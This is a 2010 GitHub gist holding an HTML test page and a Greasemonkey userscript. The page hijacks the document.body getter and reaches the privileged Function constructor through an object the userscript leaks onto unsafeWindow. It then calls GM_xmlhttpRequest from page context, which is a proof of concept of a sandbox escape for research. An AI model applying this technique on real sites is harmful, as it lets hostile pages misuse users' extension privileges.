Created
February 1, 2010 03:36
-
-
Save xulapp/291437 to your computer and use it in GitHub Desktop.
unsafeWindow に対していろいろやってみるテスト
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title></title> | |
| </head> | |
| <body></body> | |
| <script> | |
| var body = document.body; | |
| function getBody() { | |
| log('getBody.caller: ' + getBody.caller); | |
| return body; | |
| } | |
| document.__defineGetter__('body', getBody); | |
| var timer = setInterval(function() { | |
| if (typeof leaked === 'undefined') return; | |
| clearInterval(timer); | |
| var GM_Function = leaked.constructor.constructor; | |
| var GM_Global = GM_Function('return this')(); | |
| // access violation that will not be able to catch | |
| GM_Global.GM_xmlhttpRequest({method: 'GET', url: 'http://example.com/', onload: function(res) log(res.status)}); | |
| GM_Function('GM_xmlhttpRequest({method: "GET", url: "http://example.com/", onload: function(res) alert(res.status)})')(); | |
| GM_Global.setTimeout(GM_Function('GM_xmlhttpRequest({method: "GET", url: "http://example.com/", onload: function(res) alert(res.status)})'), 0); | |
| GM_Function('setTimeout(function() GM_xmlhttpRequest({method: "GET", url: "http://example.com/", onload: function(res) alert(res.status)}), 0)')(); | |
| GM_Global.document.addEventListener('oreore', GM_Function('setTimeout(function() GM_xmlhttpRequest({method: "GET", url: "http://example.com/", onload: function(res) alert(res.status)}), 0)'), true); | |
| GM_Function('document.addEventListener("oreore", function() GM_xmlhttpRequest({method: "GET", url: "http://example.com/", onload: function(res) alert(res.status)}), true)')(); | |
| var event = document.createEvent('Event'); | |
| event.initEvent('oreore', false, false); | |
| document.dispatchEvent(event); | |
| log('end'); | |
| }, 100); | |
| function log() { | |
| body.appendChild(document.createElement('div')) | |
| .innerHTML = Array.slice(arguments); | |
| } | |
| </script> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name GM trap test | |
| // @namespace http://twitter.com/xulapp | |
| // @include http://localhost/gmtrap.htm | |
| // ==/UserScript== | |
| (function GM_main() { | |
| unsafeWindow.document.body; | |
| unsafeWindow.getBody(); | |
| try { | |
| unsafeWindow.xhr = GM_xmlhttpRequest; | |
| } catch (e) { | |
| GM_log('cannot set GM_api to unsafe: ' + e); | |
| } | |
| unsafeWindow.leaked = {}; | |
| })(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment